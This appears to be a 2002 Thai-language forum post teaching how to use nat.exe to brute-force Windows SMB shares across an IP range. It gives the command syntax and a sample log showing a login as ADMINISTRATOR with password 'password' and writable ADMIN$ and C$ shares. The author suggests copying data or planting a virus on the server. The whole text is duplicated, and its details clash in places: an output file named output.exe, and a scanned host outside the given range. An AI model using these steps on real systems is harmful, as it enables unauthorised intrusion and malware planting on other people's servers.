asylu3
07-10-2002, 01:21 AM
การใช้ NAT เจาะ Share Harddisk เปิดการควบคุมแบบ Full Control
ต่อจากบทที่แล้ว เราจะทำยังไงให้สามารถค้นหา Share แบบ Full Control ได้ เราสามารถใช้ nat.exe มาเพื่อหา Full Control ได้แต่ก่อนอื่นกรุณาดูรูปแบบคำสั่งของ nat เสียก่อน
nat -o output.file -u userlist.file -p passlist.file address
-o คือแสดง output ที่เกิดจากการ scan หา share เก็บไว้ที่ไฟล์ output.file
-u ชื่อ user เพื่อใช้ในการเปิด Share
-p password เพื่อใช้ในการเปิด Share
nat -o output.txt -u user.txt -p pass.txt 203.73.131.10-203.73.131.30
หา Share แบบ Full Control ตั้งแต่ 203.73.131.10 จนถึง 30 และใช้ user.txt กับ pass.txt ในการเปิด โดยให้ output ข้อมูลที่ได้ไปเก็บไว้ที่ไฟล์ output.exe
--- Reading usernames from userlist.txt
--- Reading passwords from passlist.txt
--- Checking host: 204.73.131.11
--- Obtaining list of remote NetBIOS names
--- Attempting to connect with name: *
--- Unable to connect
--- Attempting to connect with name: *SMBSERVER
--- CONNECTED with name: *SMBSERVER
--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
--- Server time is Mon Dec 01 07:44:34 1997
--- Timezone is UTC-6.0
--- Remote server wants us to encrypt, telling it not to
--- Attempting to connect with name: *SMBSERVER
--- CONNECTED with name: *SMBSERVER
--- Attempting to establish session
--- Was not able to establish session with no password
--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
--- Obtained server information: Server=[BACKUP] User=[] Workgroup=[SITE] Domain=[]
--- Obtained listing of shares: Sharename Type Comment --------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share Test Disk:
--- This machine has a browse list:
Server Comment
--------- -------
BACKUP
--- Attempting to access share: \*SMBSERVER
--- Unable to access
--- Attempting to access share: \*SMBSERVERADMIN$ --- WARNING: Able to access share: \*SMBSERVERADMIN$
--- Checking write access in: \*SMBSERVERADMIN$
--- WARNING: Directory is writeable: \*SMBSERVERADMIN$
--- Attempting to exercise .. bug on: \*SMBSERVERADMIN$
--- Attempting to access share: \*SMBSERVERC$
--- WARNING: Able to access share: \*SMBSERVERC$
--- Checking write access in: \*SMBSERVERC$
--- WARNING: Directory is writeable: \*SMBSERVERC$
--- Attempting to exercise .. bug on: \*SMBSERVERC$ --- Attempting to access share: \*SMBSERVERNETLOGON
--- WARNING: Able to access share: \*SMBSERVERNETLOGON
--- Checking write access in: \*SMBSERVERNETLOGON
--- Attempting to exercise .. bug on: \*SMBSERVERNETLOGON
--- Attempting to access share: \*SMBSERVERTest
--- WARNING: Able to access share: \*SMBSERVERTest --- Checking write access in: \*SMBSERVERTest
--- Attempting to exercise .. bug on: \*SMBSERVERTest
--- Attempting to access share: \*SMBSERVERD$
--- Unable to access
--- Attempting to access share: \*SMBSERVERROOT
--- Unable to access
--- Attempting to access share: \*SMBSERVERWINNT$ --- Unable to access
ถ้าหากว่าคุณพบ Share แบบ Control Full คุณก็จะสามารถ copy หรือจะทำยังไงก็ได้ แม้แต่เอา Virus ไปฝั่งไว้บน Server
กรุณาอ่านหนังสือ Windows NT เพื่อทำความเข้าใจเพิ่มเติม
ต่อจากบทที่แล้ว เราจะทำยังไงให้สามารถค้นหา Share แบบ Full Control ได้ เราสามารถใช้ nat.exe มาเพื่อหา Full Control ได้แต่ก่อนอื่นกรุณาดูรูปแบบคำสั่งของ nat เสียก่อน
nat -o output.file -u userlist.file -p passlist.file address
-o คือแสดง output ที่เกิดจากการ scan หา share เก็บไว้ที่ไฟล์ output.file
-u ชื่อ user เพื่อใช้ในการเปิด Share
-p password เพื่อใช้ในการเปิด Share
nat -o output.txt -u user.txt -p pass.txt 203.73.131.10-203.73.131.30
หา Share แบบ Full Control ตั้งแต่ 203.73.131.10 จนถึง 30 และใช้ user.txt กับ pass.txt ในการเปิด โดยให้ output ข้อมูลที่ได้ไปเก็บไว้ที่ไฟล์ output.exe
--- Reading usernames from userlist.txt
--- Reading passwords from passlist.txt
--- Checking host: 204.73.131.11
--- Obtaining list of remote NetBIOS names
--- Attempting to connect with name: *
--- Unable to connect
--- Attempting to connect with name: *SMBSERVER
--- CONNECTED with name: *SMBSERVER
--- Attempting to connect with protocol: MICROSOFT NETWORKS 1.03
--- Server time is Mon Dec 01 07:44:34 1997
--- Timezone is UTC-6.0
--- Remote server wants us to encrypt, telling it not to
--- Attempting to connect with name: *SMBSERVER
--- CONNECTED with name: *SMBSERVER
--- Attempting to establish session
--- Was not able to establish session with no password
--- Attempting to connect with Username: `ADMINISTRATOR' Password: `password'
--- CONNECTED: Username: `ADMINISTRATOR' Password: `password'
--- Obtained server information: Server=[BACKUP] User=[] Workgroup=[SITE] Domain=[]
--- Obtained listing of shares: Sharename Type Comment --------- ---- -------
ADMIN$ Disk: Remote Admin
C$ Disk: Default share
IPC$ IPC: Remote IPC
NETLOGON Disk: Logon server share Test Disk:
--- This machine has a browse list:
Server Comment
--------- -------
BACKUP
--- Attempting to access share: \*SMBSERVER
--- Unable to access
--- Attempting to access share: \*SMBSERVERADMIN$ --- WARNING: Able to access share: \*SMBSERVERADMIN$
--- Checking write access in: \*SMBSERVERADMIN$
--- WARNING: Directory is writeable: \*SMBSERVERADMIN$
--- Attempting to exercise .. bug on: \*SMBSERVERADMIN$
--- Attempting to access share: \*SMBSERVERC$
--- WARNING: Able to access share: \*SMBSERVERC$
--- Checking write access in: \*SMBSERVERC$
--- WARNING: Directory is writeable: \*SMBSERVERC$
--- Attempting to exercise .. bug on: \*SMBSERVERC$ --- Attempting to access share: \*SMBSERVERNETLOGON
--- WARNING: Able to access share: \*SMBSERVERNETLOGON
--- Checking write access in: \*SMBSERVERNETLOGON
--- Attempting to exercise .. bug on: \*SMBSERVERNETLOGON
--- Attempting to access share: \*SMBSERVERTest
--- WARNING: Able to access share: \*SMBSERVERTest --- Checking write access in: \*SMBSERVERTest
--- Attempting to exercise .. bug on: \*SMBSERVERTest
--- Attempting to access share: \*SMBSERVERD$
--- Unable to access
--- Attempting to access share: \*SMBSERVERROOT
--- Unable to access
--- Attempting to access share: \*SMBSERVERWINNT$ --- Unable to access
ถ้าหากว่าคุณพบ Share แบบ Control Full คุณก็จะสามารถ copy หรือจะทำยังไงก็ได้ แม้แต่เอา Virus ไปฝั่งไว้บน Server
กรุณาอ่านหนังสือ Windows NT เพื่อทำความเข้าใจเพิ่มเติม